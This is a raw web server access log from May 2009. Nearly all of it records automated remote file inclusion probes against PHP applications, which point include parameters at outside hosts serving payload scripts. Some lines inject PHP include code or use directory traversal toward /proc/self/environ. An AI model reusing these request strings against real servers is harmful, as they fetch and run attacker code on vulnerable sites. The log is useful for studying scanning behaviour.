220.181.7.97 - - [26/May/2009:04:08:19 -0500] "GET / HTTP/1.1" 200 3245 "-""Baiduspider+(+http://www.baidu.com/search/spider.htm)"
121.165.73.157 - - [26/May/2009:04:08:22 -0500] "GET /logs/errors.php?error=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 298 "-""Mozilla/5.0"
121.165.73.157 - - [26/May/2009:04:08:22 -0500] "GET /logs/access_log.1237507200/errors.php?error=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
121.165.73.157 - - [26/May/2009:04:08:23 -0500] "GET /errors.php?error=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 293 "-""Mozilla/5.0"
74.202.111.66 - - [26/May/2009:04:10:42 -0500] "GET /logs//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://poisonx.ucoz.com/braid.txt?? HTTP/1.1" 404 313 "-""Mozilla/5.0"
74.202.111.66 - - [26/May/2009:04:10:42 -0500] "GET /logs/access_log.1240012800//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://poisonx.ucoz.com/braid.txt?? HTTP/1.1" 404 335 "-""Mozilla/5.0"
74.202.111.66 - - [26/May/2009:04:10:42 -0500] "GET //weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://poisonx.ucoz.com/braid.txt?? HTTP/1.1" 404 308 "-""Mozilla/5.0"
74.202.111.66 - - [26/May/2009:04:10:47 -0500] "GET /logs/access_log.1242000000//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://poisonx.ucoz.com/braid.txt?? HTTP/1.1" 404 335 "-""Mozilla/5.0"
74.208.73.49 - - [26/May/2009:04:11:24 -0500] "GET /logs/modules/My_eGallery/index.php?basepath=http://www.nw.or.kr/bbs/icon/omilaid.txt?? HTTP/1.1" 404 317 "-""libwww-perl/5.803"
74.208.73.49 - - [26/May/2009:04:11:24 -0500] "GET /modules/My_eGallery/index.php?basepath=http://www.nw.or.kr/bbs/icon/omilaid.txt?? HTTP/1.1" 404 312 "-""libwww-perl/5.803"
74.208.73.49 - - [26/May/2009:04:11:24 -0500] "GET /logs/modules/My_eGallery/index.php?basepath=http://www.nw.or.kr/bbs/icon/omilaid.txt?? HTTP/1.1" 404 317 "-""libwww-perl/5.803"
74.208.73.49 - - [26/May/2009:04:11:24 -0500] "GET /modules/My_eGallery/index.php?basepath=http://www.nw.or.kr/bbs/icon/omilaid.txt?? HTTP/1.1" 404 312 "-""libwww-perl/5.803"
121.130.29.11 - - [26/May/2009:04:12:38 -0500] "GET //?_SERVER%5BDOCUMENT_ROOT%5D=http://www.angelcitytrading.com/css/1.txt?? HTTP/1.1" 200 3245 "-""Mozilla/5.0"
121.130.29.11 - - [26/May/2009:04:12:43 -0500] "GET /logs/access_log.1237507200//?_SERVER%5BDOCUMENT_ROOT%5D=http://www.angelcitytrading.com/css/1.txt?? HTTP/1.1" 404 311 "-""Mozilla/5.0"
121.130.29.11 - - [26/May/2009:04:12:45 -0500] "GET /logs//?_SERVER%5BDOCUMENT_ROOT%5D=http://www.angelcitytrading.com/css/1.txt?? HTTP/1.1" 200 190846 "-""Mozilla/5.0"
121.165.73.157 - - [26/May/2009:04:13:52 -0500] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 306 "-""Mozilla/5.0"
121.165.73.157 - - [26/May/2009:04:13:52 -0500] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 301 "-""Mozilla/5.0"
121.165.73.157 - - [26/May/2009:04:13:52 -0500] "GET /logs/access_log.1233619200//s_loadenv.inc.php?DOCUMENT_ROOT=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 328 "-""Mozilla/5.0"
85.18.117.101 - - [26/May/2009:04:14:35 -0500] "GET /?_zb_path=http://elestial.tv/includes/id1.txt? HTTP/1.1" 200 3245 "-""Mozilla/5.0"
85.18.117.101 - - [26/May/2009:04:14:38 -0500] "GET /logs/access_log.1236470400/?_zb_path=http://elestial.tv/includes/id1.txt? HTTP/1.1" 404 310 "-""Mozilla/5.0"
85.18.117.101 - - [26/May/2009:04:14:38 -0500] "GET /logs/access_log.1236124800/?_zb_path=http://elestial.tv/includes/id1.txt? HTTP/1.1" 404 310 "-""Mozilla/5.0"
85.18.117.101 - - [26/May/2009:04:14:58 -0500] "GET /logs/?_zb_path=http://elestial.tv/includes/id1.txt? HTTP/1.1" 200 190841 "-""Mozilla/5.0"
121.165.73.157 - - [26/May/2009:04:15:09 -0500] "GET /logs/access_log.1238889600//s_loadenv.inc.php?DOCUMENT_ROOT=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 328 "-""Mozilla/5.0"
203.151.233.106 - - [26/May/2009:04:15:17 -0500] "GET /logs/access_log.1237507200//?_SERVER%5BDOCUMENT_ROOT%5D=http://www.angelcitytrading.com/css/1.txt?? HTTP/1.1" 404 311 "-""Mozilla/5.0"
203.151.233.106 - - [26/May/2009:04:15:17 -0500] "GET //?_SERVER%5BDOCUMENT_ROOT%5D=http://www.angelcitytrading.com/css/1.txt?? HTTP/1.1" 200 3245 "-""Mozilla/5.0"
203.151.233.106 - - [26/May/2009:04:15:20 -0500] "GET /logs//?_SERVER%5BDOCUMENT_ROOT%5D=http://www.angelcitytrading.com/css/1.txt?? HTTP/1.1" 200 190846 "-""Mozilla/5.0"
87.106.67.146 - - [26/May/2009:04:15:52 -0500] "GET /logs/access_log.1235606400/index/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://largeface.com/gnuboard4/tail/fid.txt? HTTP/1.1" 404 325 "-""Mozilla/5.0"
87.106.67.146 - - [26/May/2009:04:16:17 -0500] "GET /logs/access_log.1234051200/index/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://largeface.com/gnuboard4/tail/fid.txt? HTTP/1.1" 404 325 "-""Mozilla/5.0"
65.49.2.99 - - [26/May/2009:04:16:32 -0500] "GET /logs//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://poisonx.ucoz.com/braid.txt?? HTTP/1.1" 404 313 "-""Mozilla/5.0"
65.49.2.99 - - [26/May/2009:04:16:33 -0500] "GET /logs/access_log.1240012800//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://poisonx.ucoz.com/braid.txt?? HTTP/1.1" 404 335 "-""Mozilla/5.0"
65.49.2.99 - - [26/May/2009:04:16:33 -0500] "GET //weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://poisonx.ucoz.com/braid.txt?? HTTP/1.1" 404 308 "-""Mozilla/5.0"
65.49.2.99 - - [26/May/2009:04:16:40 -0500] "GET /logs/access_log.1242000000//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://poisonx.ucoz.com/braid.txt?? HTTP/1.1" 404 335 "-""Mozilla/5.0"
203.146.102.38 - - [26/May/2009:04:17:13 -0500] "GET /logs//index.php?option=com_jce&Itemid=27&mosConfig_absolute_path=http://aaaaaaaa2.altervista.org/id.txt? HTTP/1.1" 404 298 "-""libwww-perl/5.810"
203.146.102.38 - - [26/May/2009:04:17:14 -0500] "GET //index.php?option=com_jce&Itemid=27&mosConfig_absolute_path=http://aaaaaaaa2.altervista.org/id.txt? HTTP/1.1" 404 293 "-""libwww-perl/5.810"
85.17.10.143 - - [26/May/2009:04:24:35 -0500] "GET //weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://jamur.3dn.ru/id1.txt??? HTTP/1.1" 404 308 "-""Mozilla/5.0"
85.17.10.143 - - [26/May/2009:04:24:35 -0500] "GET /logs//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://jamur.3dn.ru/id1.txt??? HTTP/1.1" 404 313 "-""Mozilla/5.0"
85.17.10.143 - - [26/May/2009:04:24:35 -0500] "GET /logs/access_log.1240012800//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://jamur.3dn.ru/id1.txt??? HTTP/1.1" 404 335 "-""Mozilla/5.0"
85.17.10.143 - - [26/May/2009:04:24:52 -0500] "GET /logs/access_log.1242000000//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://jamur.3dn.ru/id1.txt??? HTTP/1.1" 404 335 "-""Mozilla/5.0"
65.23.158.226 - - [26/May/2009:04:25:29 -0500] "GET /modules/My_eGallery/index.php?basepath=http://pdcmanagement.com/idfx1.gif??? HTTP/1.1" 404 312 "-""Mozilla/5.0"
65.23.158.226 - - [26/May/2009:04:25:29 -0500] "GET /logs/access_log.1235174400/modules/My_eGallery/index.php?basepath=http://pdcmanagement.com/idfx1.gif??? HTTP/1.1" 404 339 "-""Mozilla/5.0"
65.23.158.226 - - [26/May/2009:04:25:29 -0500] "GET /logs/modules/My_eGallery/index.php?basepath=http://pdcmanagement.com/idfx1.gif??? HTTP/1.1" 404 317 "-""Mozilla/5.0"
65.23.158.226 - - [26/May/2009:04:25:42 -0500] "GET /rfi%20modules/My_eGallery/index.php?basepath=http://pdcmanagement.com/idfx1.gif??? HTTP/1.1" 404 316 "-""Mozilla/5.0"
65.23.158.226 - - [26/May/2009:04:25:42 -0500] "GET /logs/rfi%20modules/My_eGallery/index.php?basepath=http://pdcmanagement.com/idfx1.gif??? HTTP/1.1" 404 321 "-""Mozilla/5.0"
65.23.158.226 - - [26/May/2009:04:25:42 -0500] "GET /logs/access_log.1235174400/rfi%20modules/My_eGallery/index.php?basepath=http://pdcmanagement.com/idfx1.gif??? HTTP/1.1" 404 343 "-""Mozilla/5.0"
65.23.158.226 - - [26/May/2009:04:26:05 -0500] "GET /logs/modules/My_eGallery/index.php?basepath=http://pdcmanagement.com/idfx1.gif??? HTTP/1.1" 404 317 "-""Mozilla/5.0"
65.23.158.226 - - [26/May/2009:04:26:05 -0500] "GET /logs/access_log.1235174400/modules/My_eGallery/index.php?basepath=http://pdcmanagement.com/idfx1.gif??? HTTP/1.1" 404 339 "-""Mozilla/5.0"
65.23.158.226 - - [26/May/2009:04:26:05 -0500] "GET /modules/My_eGallery/index.php?basepath=http://pdcmanagement.com/idfx1.gif??? HTTP/1.1" 404 312 "-""Mozilla/5.0"
65.23.158.226 - - [26/May/2009:04:26:14 -0500] "GET /logs/rfi%20modules/My_eGallery/index.php?basepath=http://pdcmanagement.com/idfx1.gif??? HTTP/1.1" 404 321 "-""Mozilla/5.0"
65.23.158.226 - - [26/May/2009:04:26:14 -0500] "GET /logs/access_log.1235174400/rfi%20modules/My_eGallery/index.php?basepath=http://pdcmanagement.com/idfx1.gif??? HTTP/1.1" 404 343 "-""Mozilla/5.0"
65.23.158.226 - - [26/May/2009:04:26:14 -0500] "GET /rfi%20modules/My_eGallery/index.php?basepath=http://pdcmanagement.com/idfx1.gif??? HTTP/1.1" 404 316 "-""Mozilla/5.0"
69.64.43.164 - - [26/May/2009:04:30:42 -0500] "GET /logs/index.php?to=http://www.isomassage.de/web//moduls/tirid.txt?? HTTP/1.1" 404 297 "-""libwww-perl/5.805"
69.64.43.164 - - [26/May/2009:04:30:47 -0500] "GET /index.php?to=http://www.isomassage.de/web//moduls/tirid.txt?? HTTP/1.1" 404 292 "-""libwww-perl/5.805"
219.85.63.226 - - [26/May/2009:04:31:05 -0500] "GET /logs/access_log.1238371200//faqsupport/samplefaqsupport.php?path[docroot]=http://www.waisikkai.com//components/com_registration/readme.txt?? HTTP/1.1" 404 342 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
219.85.63.226 - - [26/May/2009:04:31:05 -0500] "GET /logs//faqsupport/samplefaqsupport.php?path[docroot]=http://www.waisikkai.com//components/com_registration/readme.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
219.85.63.226 - - [26/May/2009:04:31:05 -0500] "GET //faqsupport/samplefaqsupport.php?path[docroot]=http://www.waisikkai.com//components/com_registration/readme.txt?? HTTP/1.1" 404 315 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
219.85.63.226 - - [26/May/2009:04:31:05 -0500] "GET /logs/access_log.1241654400//faqsupport/samplefaqsupport.php?path[docroot]=http://www.waisikkai.com//components/com_registration/readme.txt?? HTTP/1.1" 404 342 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
219.85.63.226 - - [26/May/2009:04:31:59 -0500] "GET //technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.waisikkai.com//components/com_registration/test.txt??? HTTP/1.1" 404 341 "-""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6"
216.120.234.169 - - [26/May/2009:04:33:10 -0500] "GET //convert/mvcw.php?step=1&vwar_root=http://ircwar.altervista.org/conf/id.txt? HTTP/1.1" 404 300 "-""Mozilla/5.0"
216.120.234.169 - - [26/May/2009:04:33:13 -0500] "GET /logs/access_log.1230076800//convert/mvcw.php?step=1&vwar_root=http://ircwar.altervista.org/conf/id.txt? HTTP/1.1" 404 327 "-""Mozilla/5.0"
216.120.234.169 - - [26/May/2009:04:33:13 -0500] "GET /logs//convert/mvcw.php?step=1&vwar_root=http://ircwar.altervista.org/conf/id.txt? HTTP/1.1" 404 305 "-""Mozilla/5.0"
216.119.103.12 - - [26/May/2009:04:33:37 -0500] "GET /db.php?path_local=http://www.rakkasanwarriors.com/id1.txt? HTTP/1.1" 404 289 "-""Mozilla/5.0"
216.119.103.12 - - [26/May/2009:04:33:37 -0500] "GET /logs/db.php?path_local=http://www.rakkasanwarriors.com/id1.txt? HTTP/1.1" 404 294 "-""Mozilla/5.0"
216.119.103.12 - - [26/May/2009:04:33:37 -0500] "GET /logs/access_log.1242086400/db.php?path_local=http://www.rakkasanwarriors.com/id1.txt? HTTP/1.1" 404 316 "-""Mozilla/5.0"
216.119.103.12 - - [26/May/2009:04:33:37 -0500] "GET /logs/access_log.1240099200/db.php?path_local=http://www.rakkasanwarriors.com/id1.txt? HTTP/1.1" 404 316 "-""Mozilla/5.0"
216.119.103.12 - - [26/May/2009:04:34:16 -0500] "GET /logs/access_log.1242086400/db.php?path_local=http://www.rakkasanwarriors.com/id1.txt? HTTP/1.1" 404 316 "-""Mozilla/5.0"
216.119.103.12 - - [26/May/2009:04:34:16 -0500] "GET /db.php?path_local=http://www.rakkasanwarriors.com/id1.txt? HTTP/1.1" 404 289 "-""Mozilla/5.0"
216.119.103.12 - - [26/May/2009:04:34:16 -0500] "GET /logs/db.php?path_local=http://www.rakkasanwarriors.com/id1.txt? HTTP/1.1" 404 294 "-""Mozilla/5.0"
216.119.103.12 - - [26/May/2009:04:34:16 -0500] "GET /logs/access_log.1240099200/db.php?path_local=http://www.rakkasanwarriors.com/id1.txt? HTTP/1.1" 404 316 "-""Mozilla/5.0"
216.119.103.12 - - [26/May/2009:04:34:16 -0500] "GET /db.php?path_local=http://www.rakkasanwarriors.com/id1.txt? HTTP/1.1" 404 289 "-""Mozilla/5.0"
216.119.103.12 - - [26/May/2009:04:34:16 -0500] "GET /logs/db.php?path_local=http://www.rakkasanwarriors.com/id1.txt? HTTP/1.1" 404 294 "-""Mozilla/5.0"
216.119.103.12 - - [26/May/2009:04:34:16 -0500] "GET /logs/access_log.1242086400/db.php?path_local=http://www.rakkasanwarriors.com/id1.txt? HTTP/1.1" 404 316 "-""Mozilla/5.0"
216.119.103.12 - - [26/May/2009:04:34:16 -0500] "GET /logs/access_log.1240099200/db.php?path_local=http://www.rakkasanwarriors.com/id1.txt? HTTP/1.1" 404 316 "-""Mozilla/5.0"
91.195.124.16 - - [26/May/2009:04:36:34 -0500] "GET /logs/wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.sbe.es/buggsbunny?? HTTP/1.1" 404 349 "-""Mozilla/5.0 (BeOS; U; BeOS BePC; en-US; rv:1.9a1) Gecko/20051002 Firefox/1.6a1"
91.195.124.16 - - [26/May/2009:04:36:34 -0500] "GET /wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.sbe.es/buggsbunny?? HTTP/1.1" 404 344 "-""Mozilla/5.0 (BeOS; U; BeOS BePC; en-US; rv:1.9a1) Gecko/20051002 Firefox/1.6a1"
91.195.124.16 - - [26/May/2009:04:36:35 -0500] "GET /logs/errors.php?error=http://www.sbe.es/buggsbunny?? HTTP/1.1" 404 298 "-""Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.9 sun4u; X11)"
91.195.124.16 - - [26/May/2009:04:36:35 -0500] "GET /errors.php?error=http://www.sbe.es/buggsbunny?? HTTP/1.1" 404 293 "-""Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.9 sun4u; X11)"
91.195.124.16 - - [26/May/2009:04:36:35 -0500] "GET /logs/wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 349 "-""XXXXXX"
91.195.124.16 - - [26/May/2009:04:36:35 -0500] "GET /wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 344 "-""XXXXXX"
91.195.124.16 - - [26/May/2009:04:36:35 -0500] "GET /logs/wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 349 "-""XXXXXX"
91.195.124.16 - - [26/May/2009:04:36:35 -0500] "GET /wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 344 "-""XXXXXX"
66.175.122.228 - - [26/May/2009:04:36:36 -0500] "GET /logs/access_log.1240012800//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 335 "-""Mozilla/5.0"
66.175.122.228 - - [26/May/2009:04:36:36 -0500] "GET /logs//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 313 "-""Mozilla/5.0"
66.175.122.228 - - [26/May/2009:04:36:36 -0500] "GET //weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 308 "-""Mozilla/5.0"
66.175.122.228 - - [26/May/2009:04:37:57 -0500] "GET /logs/access_log.1242000000//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 335 "-""Mozilla/5.0"
121.188.91.69 - - [26/May/2009:04:39:35 -0500] "GET //admin/include/lib.module.php?mod_root=http://finance-911.com/done/.log/idxx.txt?? HTTP/1.1" 404 312 "-""Mozilla/5.0"
121.188.91.69 - - [26/May/2009:04:39:35 -0500] "GET /logs//admin/include/lib.module.php?mod_root=http://finance-911.com/done/.log/idxx.txt?? HTTP/1.1" 404 317 "-""Mozilla/5.0"
121.188.91.69 - - [26/May/2009:04:39:39 -0500] "GET /logs/access_log.1241222400//admin/include/lib.module.php?mod_root=http://finance-911.com/done/.log/idxx.txt?? HTTP/1.1" 404 339 "-""Mozilla/5.0"
38.108.70.51 - - [26/May/2009:04:40:28 -0500] "GET /logs//faqsupport/samplefaqsupport.php?path[docroot]=http://www.bigfishingforum.com/components/id.txt??? HTTP/1.1" 404 320 "-""libwww-perl/5.814"
38.108.70.51 - - [26/May/2009:04:40:41 -0500] "GET //faqsupport/samplefaqsupport.php?path[docroot]=http://www.bigfishingforum.com/components/id.txt??? HTTP/1.1" 404 315 "-""libwww-perl/5.814"
38.108.70.51 - - [26/May/2009:04:42:58 -0500] "GET //faqsupport/samplefaqsupport.php?path[docroot]=http://www.bigfishingforum.com/components/id.txt??? HTTP/1.1" 404 315 "-""libwww-perl/5.814"
38.108.70.51 - - [26/May/2009:04:43:00 -0500] "GET /logs//faqsupport/samplefaqsupport.php?path[docroot]=http://www.bigfishingforum.com/components/id.txt??? HTTP/1.1" 404 320 "-""libwww-perl/5.814"
58.227.193.198 - - [26/May/2009:04:43:48 -0500] "GET /logs/e404.php?DOCUMENT_ROOT=http://www.laxestereo.com/liverequest/req/copyright???? HTTP/1.1" 404 296 "-""Mozilla/5.0"
58.227.193.198 - - [26/May/2009:04:43:48 -0500] "GET /logs/access_log.1237852800/e404.php?DOCUMENT_ROOT=http://www.laxestereo.com/liverequest/req/copyright???? HTTP/1.1" 404 318 "-""Mozilla/5.0"
58.227.193.198 - - [26/May/2009:04:43:48 -0500] "GET /e404.php?DOCUMENT_ROOT=http://www.laxestereo.com/liverequest/req/copyright???? HTTP/1.1" 404 291 "-""Mozilla/5.0"
58.227.193.198 - - [26/May/2009:04:43:48 -0500] "GET /logs/access_log.1239667200/e404.php?DOCUMENT_ROOT=http://www.laxestereo.com/liverequest/req/copyright???? HTTP/1.1" 404 318 "-""Mozilla/5.0"
65.55.106.188 - - [26/May/2009:04:43:49 -0500] "GET /logs/access_log.1134950400 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
38.108.70.51 - - [26/May/2009:04:44:03 -0500] "GET /logs//faqsupport/samplefaqsupport.php?path[docroot]=http://www.bigfishingforum.com/components/id.txt??? HTTP/1.1" 404 320 "-""libwww-perl/5.814"
38.108.70.51 - - [26/May/2009:04:44:08 -0500] "GET //faqsupport/samplefaqsupport.php?path[docroot]=http://www.bigfishingforum.com/components/id.txt??? HTTP/1.1" 404 315 "-""libwww-perl/5.814"
38.108.70.51 - - [26/May/2009:04:44:29 -0500] "GET //faqsupport/samplefaqsupport.php?path[docroot]=http://www.bigfishingforum.com/components/id.txt??? HTTP/1.1" 404 315 "-""libwww-perl/5.814"
38.108.70.51 - - [26/May/2009:04:44:40 -0500] "GET /logs//faqsupport/samplefaqsupport.php?path[docroot]=http://www.bigfishingforum.com/components/id.txt??? HTTP/1.1" 404 320 "-""libwww-perl/5.814"
38.108.70.51 - - [26/May/2009:04:45:17 -0500] "GET /logs//faqsupport/samplefaqsupport.php?path[docroot]=http://www.bigfishingforum.com/components/id.txt??? HTTP/1.1" 404 320 "-""libwww-perl/5.814"
38.108.70.51 - - [26/May/2009:04:45:30 -0500] "GET //faqsupport/samplefaqsupport.php?path[docroot]=http://www.bigfishingforum.com/components/id.txt??? HTTP/1.1" 404 315 "-""libwww-perl/5.814"
65.55.106.186 - - [26/May/2009:04:46:19 -0500] "GET / HTTP/1.1" 200 3245 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
209.172.33.230 - - [26/May/2009:04:46:22 -0500] "GET /logs//header.php?prefix=http://www.raindrip.com/cms/baner.txt?? HTTP/1.1" 404 299 "-""Mozilla/5.0"
209.172.33.230 - - [26/May/2009:04:46:22 -0500] "GET /logs/access_log.1241395200//header.php?prefix=http://www.raindrip.com/cms/baner.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
209.172.33.230 - - [26/May/2009:04:46:22 -0500] "GET //header.php?prefix=http://www.raindrip.com/cms/baner.txt?? HTTP/1.1" 404 294 "-""Mozilla/5.0"
38.99.44.102 - - [26/May/2009:04:46:23 -0500] "GET /logs/access_log.1242172800 HTTP/1.0" 200 689551 "-""Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
216.151.134.36 - - [26/May/2009:04:46:29 -0500] "GET /e404.php?DOCUMENT_ROOT=http://www.laxestereo.com/liverequest/req/copyright???? HTTP/1.1" 404 291 "-""Mozilla/5.0"
216.151.134.36 - - [26/May/2009:04:46:29 -0500] "GET /logs/access_log.1237852800/e404.php?DOCUMENT_ROOT=http://www.laxestereo.com/liverequest/req/copyright???? HTTP/1.1" 404 318 "-""Mozilla/5.0"
216.151.134.36 - - [26/May/2009:04:46:29 -0500] "GET /logs/e404.php?DOCUMENT_ROOT=http://www.laxestereo.com/liverequest/req/copyright???? HTTP/1.1" 404 296 "-""Mozilla/5.0"
216.151.134.36 - - [26/May/2009:04:46:29 -0500] "GET /logs/access_log.1239667200/e404.php?DOCUMENT_ROOT=http://www.laxestereo.com/liverequest/req/copyright???? HTTP/1.1" 404 318 "-""Mozilla/5.0"
216.119.103.12 - - [26/May/2009:04:49:43 -0500] "GET /logs//modules/4nAlbum/public/displayCategory.php?basepath=http://www.tenniskreis-gt.de//redaxo/include/id.txt??? HTTP/1.1" 404 331 "-""libwww-perl/5.805"
216.119.103.12 - - [26/May/2009:04:49:43 -0500] "GET //modules/4nAlbum/public/displayCategory.php?basepath=http://www.tenniskreis-gt.de//redaxo/include/id.txt??? HTTP/1.1" 404 326 "-""libwww-perl/5.805"
65.55.106.166 - - [26/May/2009:04:49:49 -0500] "GET /logs/access_log.1161820800 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
85.17.10.143 - - [26/May/2009:04:51:06 -0500] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://jamur.3dn.ru/id1.txt??? HTTP/1.1" 404 350 "-""Mozilla/5.0"
85.17.10.143 - - [26/May/2009:04:51:06 -0500] "GET /logs/access_log.1242086400//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://jamur.3dn.ru/id1.txt??? HTTP/1.1" 404 377 "-""Mozilla/5.0"
85.17.10.143 - - [26/May/2009:04:51:06 -0500] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://jamur.3dn.ru/id1.txt??? HTTP/1.1" 404 355 "-""Mozilla/5.0"
38.108.70.51 - - [26/May/2009:04:51:22 -0500] "GET /logs//faqsupport/samplefaqsupport.php?path[docroot]=http://www.bigfishingforum.com/components/id.txt??? HTTP/1.1" 404 320 "-""libwww-perl/5.814"
38.108.70.51 - - [26/May/2009:04:51:26 -0500] "GET //faqsupport/samplefaqsupport.php?path[docroot]=http://www.bigfishingforum.com/components/id.txt??? HTTP/1.1" 404 315 "-""libwww-perl/5.814"
85.17.10.143 - - [26/May/2009:04:51:26 -0500] "GET /logs/access_log.1242432000//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://jamur.3dn.ru/id1.txt??? HTTP/1.1" 404 377 "-""Mozilla/5.0"
121.188.91.69 - - [26/May/2009:04:51:47 -0500] "GET //admin/include/lib.module.php?mod_root=http://finance-911.com/done/.log/idxx.txt?? HTTP/1.1" 404 312 "-""Mozilla/5.0"
121.188.91.69 - - [26/May/2009:04:51:47 -0500] "GET /logs//admin/include/lib.module.php?mod_root=http://finance-911.com/done/.log/idxx.txt?? HTTP/1.1" 404 317 "-""Mozilla/5.0"
121.188.91.69 - - [26/May/2009:04:51:50 -0500] "GET /logs/access_log.1241222400//admin/include/lib.module.php?mod_root=http://finance-911.com/done/.log/idxx.txt?? HTTP/1.1" 404 339 "-""Mozilla/5.0"
216.119.103.12 - - [26/May/2009:04:53:15 -0500] "GET /logs//modules/4nAlbum/public/displayCategory.php?basepath=http://www.tenniskreis-gt.de//redaxo/include/id.txt??? HTTP/1.1" 404 331 "-""libwww-perl/5.805"
216.119.103.12 - - [26/May/2009:04:53:16 -0500] "GET //modules/4nAlbum/public/displayCategory.php?basepath=http://www.tenniskreis-gt.de//redaxo/include/id.txt??? HTTP/1.1" 404 326 "-""libwww-perl/5.805"
91.121.210.42 - - [26/May/2009:04:58:11 -0500] "GET /logs/modules/My_eGallery/index.php?basepath=http://www.nw.or.kr/bbs/icon/idxx.txt?? HTTP/1.1" 404 317 "-""Mozilla/5.0"
91.121.210.42 - - [26/May/2009:04:58:11 -0500] "GET /logs/access_log.1239580800/modules/My_eGallery/index.php?basepath=http://www.nw.or.kr/bbs/icon/idxx.txt?? HTTP/1.1" 404 339 "-""Mozilla/5.0"
91.121.210.42 - - [26/May/2009:04:58:11 -0500] "GET /modules/My_eGallery/index.php?basepath=http://www.nw.or.kr/bbs/icon/idxx.txt?? HTTP/1.1" 404 312 "-""Mozilla/5.0"
91.121.210.42 - - [26/May/2009:04:58:11 -0500] "GET /logs/access_log.1231200000/modules/My_eGallery/index.php?basepath=http://www.nw.or.kr/bbs/icon/idxx.txt?? HTTP/1.1" 404 339 "-""Mozilla/5.0"
91.121.210.42 - - [26/May/2009:04:58:28 -0500] "GET /modules/My_eGallery/index.php?basepath=http://www.nw.or.kr/bbs/icon/idxx.txt?? HTTP/1.1" 404 312 "-""Mozilla/5.0"
91.121.210.42 - - [26/May/2009:04:58:28 -0500] "GET /logs/access_log.1231200000/modules/My_eGallery/index.php?basepath=http://www.nw.or.kr/bbs/icon/idxx.txt?? HTTP/1.1" 404 339 "-""Mozilla/5.0"
91.121.210.42 - - [26/May/2009:04:58:28 -0500] "GET /logs/modules/My_eGallery/index.php?basepath=http://www.nw.or.kr/bbs/icon/idxx.txt?? HTTP/1.1" 404 317 "-""Mozilla/5.0"
